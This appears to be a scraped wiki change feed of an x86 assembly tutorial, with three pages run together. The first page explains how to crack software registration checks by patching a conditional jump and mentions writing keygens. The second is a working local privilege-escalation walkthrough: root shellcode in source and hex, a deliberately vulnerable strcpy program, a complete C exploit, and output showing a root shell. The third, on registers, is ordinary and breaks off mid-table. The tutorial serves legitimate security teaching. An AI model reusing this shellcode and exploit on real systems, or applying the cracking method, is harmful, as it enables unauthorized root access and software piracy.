<div>{{Infobox assembly}}<br />
<br />
This section will go over several techniques used by crackers to register games/software. I don't mention cd-cracks, because I don't know how to do those; rather, I mention attacks that are generally based on a key or registration code. <br />
<br />
== Common Protections ==<br />
<br />
The most common protection, and the one discussed here, is when a program requires a registration key to unlock. Usually, the key is based either on a random registration code provided by the program, or based on the username you enter. <br />
<br />
I'll list some definitions here. Note that these definitions are mine, and won't necessarily correspond to definitions others use. These are simply to make it easier to understand this and the following sections:<br />
* A '''''registration code''''' is a code generated by a program, that the registration key is derived from or checked against.<br />
* A '''''registration username''''' or just username is a username that a user enters. The registration key is based on that username. <br />
* A '''''registration key''''' is the key used to unlock a program. It may be based on a registration code, on a registration username, or based on nothing at all. <br />
<br />
<br />
== Finding the Spot ==<br />
<br />
The very first example goes over Starcraft's CDKey verification algorithm, but I provided the algorithm. Starcraft's is the simplest kind of verification: the key verifies itself without a username or code. The question is, how do you find the algorithm?<br />
<br />
Well, the unfortunate answer is, it varies, and it generally isn't easy. <br />
<br />
The first step is obviously to disassemble the program. After that, as a cracker, you have to try and find a weak point in the program. Here are several techniques:<br />
* Search for the text prompting for the key<br />
* Search for the registration code in memory, and find out where it's accessed<br />
* Enter a code, have it fail, then search memory for that failed code<br />
* Search for anything unique about the registration (colors, text, dialogs, etc).<br />
* Search for the registry key that stores the key<br />
* Search for a file that stores registration information<br />
* Search for the error message when a bad key is given<br />
<br />
The last technique is the most useful one, I've found. However, trying them all, and trying anything else that seems to suit the game works best. In the example in the next section, I found that searching for the text informing the user that the software is unregistered worked well for the game, as you'll see later. I may do a second example where I searched for the file that stored the key, and where it was created. <br />
<br />
To find Starcraft's CDKey verifier, I started with the network traffic, at the Winsock functions (send() and recv()). From there, I backtracked to find where the packet is sent that validates the Starcraft key with Battle.net. It was a lot of work, but at the time I was learning about Starcraft's network activity so it was mostly a side-effect of what I was already doing. If I continue writing these tutorials, I might eventually get into that much detail, but I have no plans to yet. <br />
<br />
== Cracking the Game ==<br />
Once the right spot is found, cracking a game is often very easy. Typically, a program will have the following code:<br />
<pre><br />
if(keyIsValid)<br />
unlock()<br />
else<br />
displayError()<br />
</pre><br />
<br />
The assembly for that would look like:<br />
85 xx test keyIsValid, keyIsValid<br />
74 07 jz error<br />
e8 xx xx xx xx call unlock<br />
eb 05 jmp done<br />
error:<br />
e8 xx xx xx xx call displayError<br />
done:<br />
<br />
As discussed in the section on machine code, the bytes to the left are the machine code bytes (I did them quickly from a reference sheet, so they may or may not be exactly correct). This program can be modified by changing a couple of bytes, which can either force the code to always jump or never jump.<br />
<br />
To force the code to jump (which, in this case, will make the key always invalid), the jz is replaced with a jmp (by changing 74 to eb):<br />
85 xx test keyIsValid, keyIsValid<br />
eb 07 jmp error<br />
e8 xx xx xx xx call unlock<br />
eb 05 jmp done<br />
error:<br />
e8 xx xx xx xx call displayError<br />
done:<br />
<br />
To prevent the code from jumping (which, in this case, will make the key always valid), the jz is replaced with a pair of nop instructions:<br />
85 xx test keyIsValid, keyIsValid<br />
90 nop<br />
90 nop<br />
e8 xx xx xx xx call unlock<br />
eb 05 jmp done<br />
error:<br />
e8 xx xx xx xx call displayError<br />
done:<br />
<br />
Make the appropriate change, run the game, and type in any code. The expected result should occur! <br />
<br />
The next example will show this on an actual game (on a game that I won't name here, for obvious reasons). <br />
<br />
== Writing a Keygen ==<br />
Even better than cracking a game is writing a keygen for it. The user enters their username or registration code, and the keygen outputs a valid key. <br />
<br />
Generally, this requires that the algorithm be fully reverse engineered and understood. Then a copy of it is made in C (or whatever language) which produces the same results. Note that the first three examples in this tutorial do just that: turning the assembly code back into C. So anybody who actually followed them should be in a good position to write a keygen, which will come in a later tutorial. <br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Example_4&diff=3161Example 42012-01-16T22:54:03Z<p>Killboy: /* Reminder: the Stack */</p>
<hr />
<div>{{Infobox assembly}}<br />
[[Category: Assembly Examples]]<br />
<br />
This is the first practical example here, and I thought it appropriate to use something that not only illustrates the concept of machine code, but also involves something I'm very interested in: security. <br />
<br />
This example will demonstrate a stack overflow vulnerability. <br />
<br />
This example will be done on Linux, with gcc. Windows does funny things to the stack that I don't really want to explain, and exploiting a vulnerability on Windows is trickier. <br />
<br />
For more information on stack overflows, have a look at the paper [http://insecure.org/stf/smashstack.html Smashing the Stack for Fun and Profit] by Aleph One. <br />
<br />
== Local Exploits ==<br />
If you haven't done any real research on vulnerabilities and exploits, that's fine. This section will briefly cover what you need to know. <br />
<br />
Some programs on Linux run with root, or superuser, privilege. For example, programs that need access to the password file require root access, since the password file is unreadable by normal users. If a user can take control of one of these programs and have it run a shell, the shell will run as the same user as the program, which is root. From there, the attacker can run whichever program he chooses with root access, which means he has full control of the system. <br />
<br />
So the steps are:<br />
* Find a SetUID program (ie, a program that runs as root)<br />
* Find a vulnerability in the program<br />
* Exploit it<br />
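<br />
For the first step, "runs as root" comes down to two facts about the file: it is owned by root (uid 0) and it has the SetUID bit set. Here is a minimal sketch of that check using the standard stat() call. The two function names are mine:<br />

```c
#include <sys/types.h>
#include <sys/stat.h>

/* A file runs as root when it is owned by uid 0 and has the SetUID bit. */
int is_setuid_root(uid_t owner, mode_t mode)
{
    return owner == 0 && (mode & S_ISUID) != 0;
}

/* Returns 1 if the file at path is SetUID root, 0 if it is not,
 * and -1 if the file cannot be examined. */
int path_is_setuid_root(const char *path)
{
    struct stat st;

    if (stat(path, &st) != 0)
        return -1;
    return is_setuid_root(st.st_uid, st.st_mode);
}
```

The same bit shows up as the "s" in the owner column of an "ls -l" listing.<br />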
<br />
The way to exploit the vulnerability is to trick the program into running arbitrary machine code, supplied by the attacker. The machine code, of course, represents assembly instructions. This machine code is called "shellcode", because it traditionally spawns a shell for the attacker. <br />
<br />
== Shellcode ==<br />
Here is some standard shellcode, with annotations. I won't explain what this does, because you should know how every line works, by now. The only tricky part is the Linux system call, which is explained in the comments:<br />
<pre><br />
;;;;;;;;<br />
; Name: shellcode.asm<br />
; Author: Jon Erickson<br />
; Date: March 24, 2005<br />
; To compile: nasm shellcode.asm<br />
; Requires: nasm <http://nasm.sourceforge.net><br />
;<br />
; Purpose: This is similar to shellcode.asm except that it<br />
; uses more condensed code and some tricks like xor'ing a<br />
; variable with itself to eliminate null (00) bytes, which<br />
; allows it to be stored in an ordinary string.<br />
;;;;;;;;<br />
BITS 32<br />
<br />
; setreuid(uid_t ruid, uid_t euid)<br />
xor eax, eax ; First eax must be 0 for the next instruction<br />
mov al, 70 ; Put 70 into eax, since setreuid is syscall #70<br />
xor ebx, ebx ; Put 0 into ebx, to set the real uid to root<br />
xor ecx, ecx ; Put 0 into ecx, to set the effective uid to root<br />
int 0x80 ; Call the kernel to make the system call happen<br />
<br />
jmp short two ; jump down to the bottom to get the address of "/bin/sh"<br />
one:<br />
pop ebx ; pop the "return address" from the stack<br />
; to put the address of the string into ebx<br />
; execve(const char *filename, char *const argv [], char *const envp[])<br />
xor eax, eax ; Clear eax<br />
mov [ebx+7], al ; Put the 0 from eax after the "/bin/sh"<br />
mov [ebx+8], ebx ; Put the address of the string from ebx here<br />
mov [ebx+12], eax ; Put null here<br />
<br />
mov al, 11 ; execve is syscall #11<br />
lea ecx, [ebx+8] ; Load the address that points to /bin/sh<br />
lea edx, [ebx+12] ; Load the address where we put null<br />
int 0x80 ; Call the kernel to make the system call happen<br />
<br />
two:<br />
call one ; Use a call to get back to the top to get this address<br />
db '/bin/sh'<br />
</pre><br />
This code can be assembled with nasm, to produce the following machine code:<br />
<pre><br />
ron@slayer:~$ nasm shellcode.asm<br />
ron@slayer:~$ hexdump -C shellcode<br />
00000000 31 c0 b0 46 31 db 31 c9 cd 80 eb 16 5b 31 c0 88 |1À°F1Û1ÉÍ.ë.[1À.|<br />
00000010 43 07 89 5b 08 89 43 0c b0 0b 8d 4b 08 8d 53 0c |C..[..C.°..K..S.|<br />
00000020 cd 80 e8 e5 ff ff ff 2f 62 69 6e 2f 73 68 |Í.èåÿÿÿ/bin/sh|<br />
</pre><br />
<br />
Note that there isn't a single '00' byte. This is intentional, because shellcode is often stored in a string, and '00', or '\0', terminates strings. <br />
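<br />
Here is a small sketch of why that matters. It compares the usual encoding of "mov eax, 0" (b8 00 00 00 00) with "xor eax, eax" (31 c0) and shows how much of each would survive a string copy. The function names are mine:<br />

```c
#include <stddef.h>
#include <string.h>

/* Returns 1 if the machine code contains a 00 byte, 0 otherwise. */
int has_nul_byte(const unsigned char *code, size_t len)
{
    return memchr(code, 0x00, len) != NULL;
}

/* Number of bytes a string function such as strcpy would copy before
 * stopping at the first 00 byte (or len if there is none). */
size_t bytes_before_nul(const unsigned char *code, size_t len)
{
    const unsigned char *nul = memchr(code, 0x00, len);

    return nul ? (size_t)(nul - code) : len;
}
```

For "mov eax, 0" only the first byte would be copied, while "xor eax, eax" clears the register just the same and gets through whole. That is why the shellcode above zeroes its registers with xor.<br />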
<br />
When this machine code runs, it attempts to spawn /bin/sh as root. This shellcode can be changed to any assembly (provided there are no 00 bytes). A common modification is changing the exploit to open a network port and listen for connections, or to connect back to the attacker. That behaviour is, obviously, used in network-based attacks. <br />
<br />
== Reminder: the Stack ==<br />
<br />
If you don't remember how the stack works, go back and re-read the section on the stack. <br />
<br />
Remember that the stack for a function looks like this, from bottom to top:<br />
* ... used by calling function ...<br />
* parameters<br />
* return address<br />
* local variables<br />
* saved registers<br />
* ...unallocated...<br />
<br />
Remember also that arrays are simply a sequence of bytes stored somewhere. In the case of local variables, the array is stored on the stack. <br />
<br />
Because an array operation is simply a memory access converted to assembly, a program doesn't actually know how long the array is. All it knows is what the programmer told it to do. If the programmer says it's ok to copy 100 bytes into an array, then the array is, presumably, at least 100 bytes long. <br />
<br />
Sometimes, a programmer forgets to check how much data the program can copy, which allows an attacker to provide too much data. The program, not knowing any better, copies the data past the end of the array, over other local variables. If it goes far enough, the return address may be overwritten. If the attacker can control the return address, then the return address can be pointed at the shellcode. Then when the "ret" instruction is issued, and ret pops off the return address to jump to, it instead gets the address of the shellcode! <br />
<br />
In other words, the return address is overwritten with the address of the shellcode, so when the function returns the shellcode runs.<br />
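<br />
Here is a safe way to watch that happen: a sketch that simulates a stack frame as a single byte array, with a 40-byte buffer followed directly by a 4-byte "return address". The layout, the names, and the 0x08048000 starting value are all assumptions made for the illustration. A real frame usually has other things between the buffer and the return address:<br />

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define BUF_SIZE        40           /* the local array */
#define FRAME_SIZE      (BUF_SIZE + 4) /* array + simulated return address */
#define ORIGINAL_RETURN 0x08048000u  /* made-up value for the demonstration */

static void store_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v & 0xFF);
    p[1] = (unsigned char)((v >> 8) & 0xFF);
    p[2] = (unsigned char)((v >> 16) & 0xFF);
    p[3] = (unsigned char)((v >> 24) & 0xFF);
}

static uint32_t load_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Copies len bytes into the simulated buffer without checking len against
 * BUF_SIZE (that is the bug), then returns the simulated return address. */
uint32_t return_address_after_copy(const unsigned char *input, size_t len)
{
    unsigned char frame[FRAME_SIZE] = { 0 };

    store_le32(frame + BUF_SIZE, ORIGINAL_RETURN);
    if (len > FRAME_SIZE)
        len = FRAME_SIZE; /* keeps the simulation itself inside its array */
    memcpy(frame, input, len);
    return load_le32(frame + BUF_SIZE);
}
```

Copying 40 bytes or fewer leaves the return address alone. Copying 44 bytes of 'A' turns it into 0x41414141.<br />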
<br />
== The Vulnerable Program ==<br />
Here is a vulnerable program I wrote several years ago, for a paper (except that I fixed a couple spelling mistakes and changed the array size). It's extremely simple, and is only meant as a demonstration:<br />
<pre><br />
/**<br />
* Name: StackVuln.c<br />
* Author: Ron Bowes<br />
* Date: March 24, 2004<br />
* To compile: gcc StackVuln.c -o StackVuln<br />
* Requires: n/a<br />
*<br />
* Purpose: This code is vulnerable to a stack overflow if 40 or more<br />
* characters are entered. The exploit for it was written by<br />
* Jon Erickson in Hacking: Art of exploitation, but I wrote<br />
* this vulnerable code independently.<br />
*/<br />
#include <stdio.h><br />
#include <string.h><br />
int main(int argc, char *argv[])<br />
{<br />
char string[40];<br />
strcpy(string, argv[1]);<br />
printf("The message was: %s\n", string);<br />
printf("Program completed normally!\n\n");<br />
return 0;<br />
}<br />
</pre><br />
<br />
== Some Testing ==<br />
First, the program is compiled and tested with normal data:<br />
<pre><br />
ron@slayer:~$ gcc StackVuln.c -o StackVuln<br />
ron@slayer:~$ ./StackVuln "This is a test"<br />
The message was: This is a test<br />
Program completed normally!<br />
</pre><br />
<br />
Now we'll try it with progressively longer strings, in the ''gdb'' debugger, starting at 40 characters, then 50, 60. At 60, an "illegal instruction" occurs, which means we're close. Adding 4 more causes the crash we want:<br />
<pre><br />
ron@slayer:~$ gdb StackVuln<br />
(gdb) run 1234567890123456789012345678901234567890<br />
Starting program: /home/ron/StackVuln 1234567890123456789012345678901234567890<br />
The message was: 1234567890123456789012345678901234567890<br />
Program completed normally!<br />
Program exited normally.<br />
<br />
(gdb) run 12345678901234567890123456789012345678901234567890<br />
Starting program: /home/ron/StackVuln 12345678901234567890123456789012345678901234567890<br />
The message was: 12345678901234567890123456789012345678901234567890<br />
Program completed normally!<br />
Program exited normally.<br />
<br />
(gdb) run 123456789012345678901234567890123456789012345678900123456789<br />
Starting program: /home/ron/StackVuln 123456789012345678901234567890123456789012345678900123456789<br />
The message was: 123456789012345678901234567890123456789012345678900123456789<br />
Program completed normally!<br />
<br />
Program received signal SIGILL, Illegal instruction.<br />
0xb7ed3f00 in __libc_start_main () from /lib/tls/libc.so.6<br />
<br />
(gdb) run 1234567890123456789012345678901234567890123456789001234567890123<br />
Starting program: /home/ron/StackVuln 1234567890123456789012345678901234567890123456789001234567890123<br />
The message was: 1234567890123456789012345678901234567890123456789001234567890123<br />
Program completed normally!<br />
<br />
Program received signal SIGSEGV, Segmentation fault.<br />
0x33323130 in ?? ()<br />
</pre><br />
Note the address that it crashed at: 0x33323130. Remembering ASCII, we know that 0x33 is '3', 0x32 is '2', 0x31 is '1', and 0x30 is '0'. That means that the return address was overwritten by the 0123 (the bytes appear in reverse order because x86 is little-endian). This theory can be tested by changing those characters to AAAA ('A' is 0x41, so the return address will likely be 0x41414141):<br />
<pre><br />
Starting program: /home/ron/StackVuln 123456789012345678901234567890123456789012345678900123456789AAAA<br />
The message was: 123456789012345678901234567890123456789012345678900123456789AAAA<br />
Program completed normally!<br />
<br />
Program received signal SIGSEGV, Segmentation fault.<br />
0x41414141 in ?? ()<br />
</pre><br />
The expected result is confirmed! <br />
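<br />
The conversion between the last four characters and the crash address can be checked with a few lines of C. This is only a sketch, and the function name is mine. It builds a 32-bit value from four bytes the way a little-endian x86 processor reads them from memory, lowest byte first:<br />

```c
#include <stdint.h>

/* Combines four bytes into a 32-bit value, treating the first byte in
 * memory as the least significant one (little-endian). */
uint32_t le32_from_bytes(const char bytes[4])
{
    return (uint32_t)(unsigned char)bytes[0] |
           ((uint32_t)(unsigned char)bytes[1] << 8) |
           ((uint32_t)(unsigned char)bytes[2] << 16) |
           ((uint32_t)(unsigned char)bytes[3] << 24);
}
```

Passing "0123" gives 0x33323130 and passing "AAAA" gives 0x41414141, matching the two crashes.<br />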
<br />
== The Exploit ==<br />
<br />
To make this work well, I removed the display line from the program. Printing the shellcode to the terminal made things ugly. <br />
<br />
While I used my old code for the vulnerable program, I re-wrote the exploit from scratch to make it simpler, so that it doesn't require a nop-slide (See below). Here is the program that exploits the vulnerable program above, with comments:<br />
<pre><br />
/**<br />
* Name: StackExploit.c<br />
* Author: Ronald Bowes<br />
* Date: March 13, 2007<br />
* To compile: gcc StackExploit.c -o StackExploit<br />
* Requires: The vulnerable program, called "StackVuln"<br />
*<br />
* Purpose: This code, originally from Hacking: Art of exploitation,<br />
* exploits a program with a stack overflow in a 40 character buffer<br />
* by writing 64 characters to it.<br />
*/<br />
#include <stdlib.h><br />
#include <string.h><br />
#include <unistd.h><br />
<br />
int main(int argc, char *argv[])<br />
{<br />
/* This string simulates the string in the vulnerable application. As long<br />
* as this program is called with the same commandline arguments, this string<br />
* will be in the same position in memory, which lets us set the return address<br />
* in the target program. */<br />
char string[40];<br />
<br />
/* Here is the shellcode. The XXXX at the end will be overwritten by the address<br />
* of "string" */<br />
char exploit[] =<br />
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80" /* 1 - 10 */<br />
"\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b" /* 11 - 20 */<br />
"\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d" /* 21 - 30 */<br />
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f" /* 31 - 40 */<br />
"\x62\x69\x6e\x2f\x73\x68\x90\x90\x90\x90" /* 41 - 50 */<br />
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" /* 51 - 60 */<br />
"XXXX"; /* 61 - 64 */<br />
<br />
/* These two lines cause the program to execute itself the same way<br />
* the vulnerable program will be executed. This ensures that the stack<br />
* is set up identically, so the "string" declared here will have the same<br />
* address as the "string" in the vulnerable program. */<br />
if(argc < 2)<br />
execl(argv[0], "StackVuln", exploit, (char *) NULL);<br />
<br />
/* Overwrite the XXXX with the address that's being jumped to. This is the address<br />
* of our simulated variable. */<br />
*((int*)(exploit + 60)) = (int) &string;<br />
<br />
/* Finally, now call the program with our exploit as the argument */<br />
execl("./StackVuln", "StackVuln", exploit, (char *) NULL);<br />
<br />
return 0;<br />
}<br />
</pre><br />
<br />
Here, the vulnerable program is set to be SetUID (ie, run as root), and is run with the exploit program:<br />
<pre><br />
ron@slayer:~$ sudo chown root.root StackVuln<br />
ron@slayer:~$ sudo chmod +s StackVuln<br />
ron@slayer:~$ ls -l StackExploit StackVuln<br />
-rwxr-xr-x 1 ron users 11180 2007-03-14 13:46 StackExploit*<br />
-rwsr-sr-x 1 root root 11132 2007-03-14 13:36 StackVuln*<br />
ron@slayer:~$ ./StackExploit<br />
Program completed normally!<br />
<br />
sh-2.05b# whoami<br />
root<br />
</pre><br />
<br />
== nop Slide ==<br />
This section isn't necessary to assembly, but if you're curious about this exploit and ones like it, this is for you. <br />
<br />
In most cases, the attacker doesn't have the benefit of being able to simulate the stack of the original program, which makes it impossible to know where to jump. In those cases, the jump is often a guess, which may or may not be right. <br />
<br />
To avoid the requirement for pin-point accuracy, as many nop instructions as possible are commonly put in front of the shellcode. These nops, known as a nop-slide, give the attacker a bigger target to return to. Instead of having to return to a specific address, the return address need only be one of the nop instructions. If any nop instruction is hit, it runs, doing nothing, the next one runs, also doing nothing, and so on. Eventually, after the nops have all run, the shellcode is run as before. <br />
<br />
Nop slides are very common in exploits, unless the address to return to is predictable.<br />
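<br />
To see why the slide makes the target bigger, here is a tiny simulation. It doesn't execute anything. It just walks a byte array the way the processor would walk over nops (0x90) and reports where it ends up. The function name and the buffer in the usage note are made up for the illustration:<br />

```c
#include <stddef.h>
#include <stdint.h>

/* Starting at index start, steps over nop bytes (0x90) and returns the
 * index of the first byte that is not a nop, or len if it runs off the end. */
size_t slide_from(const uint8_t *buf, size_t len, size_t start)
{
    size_t i = start;

    while (i < len && buf[i] == 0x90)
        i++;
    return i;
}
```

With the buffer 90 90 90 90 31 c0, starting at index 0, 1, 2, 3 or 4 all end at index 4, where the payload begins. Five different return addresses work instead of one.<br />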
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Registers&diff=3160Registers2012-01-16T03:25:44Z<p>Killboy: /* Special Purpose Registers */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section is the first section specific to assembly. So if you're reading through the full guide, get ready for some actual learning! <br />
<br />
A register is like a variable, except that there are a fixed number of registers. Each register is a special spot in the CPU where a single value is stored. A register is the only place where math can be done (addition, subtraction, etc). Registers frequently hold pointers which reference memory. Movement of values between registers and memory is very common. <br />
<br />
Intel assembly has 8 general purpose 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp. Although any data can be moved between any of these registers, compilers commonly use the same registers for the same uses, and some instructions (such as multiplication and division) can only use the registers they're designed to use. <br />
<br />
Different compilers may have completely different conventions on how the various registers are used. For the purposes of this document, I will discuss the most common compiler, Microsoft's. <br />
<br />
== Volatility ==<br />
Some registers are typically volatile across functions, and others remain unchanged. This is a feature of the compiler's standards and must be looked after in the code; registers are not preserved automatically (although in some assembly languages they are -- but not in x86). What that means is, when a function is called, there is no guarantee that volatile registers will retain their value when the function returns, and it's the function's responsibility to preserve non-volatile registers. <br />
<br />
The conventions used by Microsoft's compiler are:<br />
* '''Volatile''': ecx, edx<br />
* '''Non-Volatile''': ebx, esi, edi, ebp<br />
* '''Special''': eax, esp (discussed later)<br />
<br />
== General Purpose Registers ==<br />
This section will look at the 8 general purpose registers on the x86 architecture.<br />
<br />
=== eax ===<br />
eax is a 32-bit general-purpose register with two common uses: to store the return value of a function and as a special register for certain calculations. It is technically a volatile register, since the value isn't preserved. Instead, its value is set to the return value of a function before a function returns. Other than esp, this is probably the most important register to remember for this reason. eax is also used specifically in certain calculations, such as multiplication and division, as a special register. That use will be examined in the instructions section. <br />
<br />
Here is an example of a function returning in C:<br />
return 3; // Return the value 3<br />
<br />
Here's the same code in assembly:<br />
mov eax, 3 ; Set eax (the return value) to 3<br />
ret ; Return<br />
<br />
=== ebx ===<br />
ebx is a non-volatile general-purpose register. It has no specific uses, but is often set to a commonly used value (such as 0) throughout a function to speed up calculations. <br />
<br />
=== ecx ===<br />
ecx is a volatile general-purpose register that is occasionally used as a function parameter or as a loop counter. <br />
<br />
Functions that use the "__fastcall" convention receive their first two parameters in ecx and edx. Additionally, when a member function of a class is called, a pointer to the object (the ''this'' pointer) is often passed in ecx, regardless of the calling convention. <br />
<br />
ecx is also often used as a loop counter. ''for'' loops generally, although not always, keep their counter variable in ecx. ''rep-'' instructions also use ecx as a counter, automatically decrementing it until it reaches 0. This class of instruction will be discussed in a later section. <br />
<br />
=== edx ===<br />
edx is a volatile general-purpose register that is occasionally used as a function parameter. Like ecx, edx is used for "__fastcall" functions. <br />
<br />
Besides fastcall, edx is generally used for storing short-term variables within a function. <br />
<br />
=== esi ===<br />
esi is a non-volatile general-purpose register that is often used as a pointer. Specifically, for "rep-" class instructions, which require a source and a destination for data, esi points to the "source". esi often stores data that is used throughout a function because it doesn't change. <br />
<br />
=== edi ===<br />
edi is a non-volatile general-purpose register that is often used as a pointer. It is similar to esi, except that it is generally used as a destination for data. <br />
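<br />
The roles of ecx, esi and edi in a ''rep-'' instruction can be sketched in C. This is only a rough model of what ''rep movsb'' does when the direction flag is clear; the function name rep_movsb_model is made up for illustration, and the real instruction works on the registers themselves rather than on function parameters:<br />

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical C model of "rep movsb" (direction flag clear).
 * esi = source pointer, edi = destination pointer, ecx = byte count.
 * Returns the final value of the counter, which is always 0. */
static uint32_t rep_movsb_model(const uint8_t *esi, uint8_t *edi, uint32_t ecx)
{
    while (ecx != 0) {
        *edi++ = *esi++;   /* copy one byte and advance both pointers */
        ecx--;             /* the counter is decremented on every step */
    }
    return ecx;
}
```

Calling rep_movsb_model(src, dst, 4) copies four bytes from src to dst, much as memcpy would.<br />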
<br />
=== ebp === <br />
ebp is a non-volatile general-purpose register that has two distinct uses depending on compile settings: it is either the frame pointer or a general purpose register. <br />
<br />
If compilation is not optimized, or code is written by hand, ebp keeps track of where the stack is at the beginning of a function (the stack will be explained in great detail in a later section). Because the stack changes throughout a function, having ebp set to the original value allows variables stored on the stack to be referenced easily. This will be explored in detail when the stack is explained. <br />
<br />
If compilation is optimized, ebp is used as a general register for storing any kind of data, and variables on the stack are instead referenced relative to the stack pointer, which moves throughout the function (this gets confusing -- luckily, IDA automatically detects and corrects for a moving stack pointer!)<br />
<br />
=== esp ===<br />
esp is a special register that stores a pointer to the top of the stack (the top is actually at a lower virtual address than the bottom as the stack grows downwards in memory towards the heap). Math is rarely done directly on esp, and the value of esp must be the same at the beginning and the end of each function. esp will be examined in much greater detail in a later section.<br />
<br />
== Special Purpose Registers ==<br />
For special purpose and floating point registers not listed here, have a look at the [http://en.wikipedia.org/wiki/IA-32 Wikipedia Article] or other reference sites. <br />
=== eip ===<br />
<br />
''eip'', or the instruction pointer, is a special-purpose register that stores the address of the instruction being executed. Making a relative jump is like adding to or subtracting from the instruction pointer. <br />
<br />
After each instruction, a value equal to the size of the instruction is added to eip, which means that eip points at the machine code for the next instruction. This simple example shows the automatic addition to eip at every step:<br />
<br />
eip+1 53 push ebx<br />
eip+4 8B 54 24 08 mov edx, [esp+arg_0]<br />
eip+2 31 DB xor ebx, ebx<br />
eip+2 89 D3 mov ebx, edx<br />
eip+3 8D 42 07 lea eax, [edx+7]<br />
.....<br />
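<br />
The same bookkeeping can be written as a short C sketch. The starting address used in the note below (0x00401000) is an arbitrary assumption and next_eip is a made-up helper name; the instruction lengths are the byte counts from the listing above:<br />

```c
#include <stddef.h>
#include <stdint.h>

/* Lengths, in bytes, of the five instructions in the listing above. */
static const uint32_t lengths[] = { 1, 4, 2, 2, 3 };

/* Hypothetical helper: the value of eip after the first `count`
 * instructions have executed, starting from `start`. No jumps are taken,
 * and `count` must not exceed the five entries in `lengths`. */
static uint32_t next_eip(uint32_t start, size_t count)
{
    uint32_t eip = start;
    for (size_t i = 0; i < count; i++)
        eip += lengths[i];   /* eip advances by the size of each instruction */
    return eip;
}
```

Starting from 0x00401000, eip is 0x00401001 after the push and 0x0040100C after all five instructions, since 1 + 4 + 2 + 2 + 3 = 12 bytes.<br />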
<br />
=== flags ===<br />
In the flags register, each bit has a specific meaning, and together the bits store meta-information about the results of previous operations: for example, whether the last calculation overflowed the register or whether the operands were equal. Our interest in the flags register usually concerns the ''cmp'' and ''test'' instructions, which commonly set or clear the zero, carry and overflow flags.<br />
These flags are then tested by a conditional jump, which may control program flow or a loop.<br />
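<br />
As a rough illustration, the effect of ''cmp'' on the zero, carry and overflow flags can be modelled in C. The struct and function names here are made up for the sketch, and only three of the flags are modelled; the real instruction updates several others as well:<br />

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical model of three bits of the flags register. */
struct flags_model {
    bool zf;   /* zero flag */
    bool cf;   /* carry flag */
    bool of;   /* overflow flag */
};

/* Model of "cmp a, b": computes a - b, throws the result away,
 * and keeps only the flags. */
static struct flags_model cmp_model(uint32_t a, uint32_t b)
{
    uint32_t r = a - b;          /* wraps around like a 32-bit register */
    struct flags_model f;
    f.zf = (r == 0);             /* set when the operands are equal */
    f.cf = (a < b);              /* set on an unsigned borrow */
    /* Signed overflow: the operands have different signs and the
     * sign of the result differs from the sign of a. */
    f.of = (((a ^ b) & (a ^ r)) >> 31) != 0;
    return f;
}
```

A conditional jump such as ''jz'' then simply checks whether zf is set.<br />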
<br />
== 16-bit and 8-bit Registers ==<br />
<br />
In addition to the 8 32-bit registers available, there are also a number of 16-bit and 8-bit registers. The confusing thing about these registers is that they use the same storage space as the 32-bit registers. In other words, every 16-bit register is the lower half of one of the 32-bit registers, so changing the 16-bit register also changes the 32-bit register. Furthermore, the 8-bit registers are part of the 16-bit registers. <br />
<br />
For example, eax is a 32-bit register. The lower half of eax is ax, a 16-bit register. ax is divided into two 8-bit registers, ah and al (a-high and a-low). <br />
<br />
* There are 8 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp.<br />
* There are 8 16-bit registers: ax, bx, cx, dx, si, di, bp, sp.<br />
* There are 8 8-bit registers: ah, al, bh, bl, ch, cl, dh, dl. <br />
<br />
The relationships between these registers are shown in the table below:<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0' width='485'><br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>eax</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ecx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>ax</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>cx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>dx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>8-bit</td><br />
<br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ah</td><br />
<td colspan='1' width='25' align='center'>al</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>bh</td><br />
<td colspan='1' width='25' align='center'>bl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ch</td><br />
<td colspan='1' width='25' align='center'>cl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
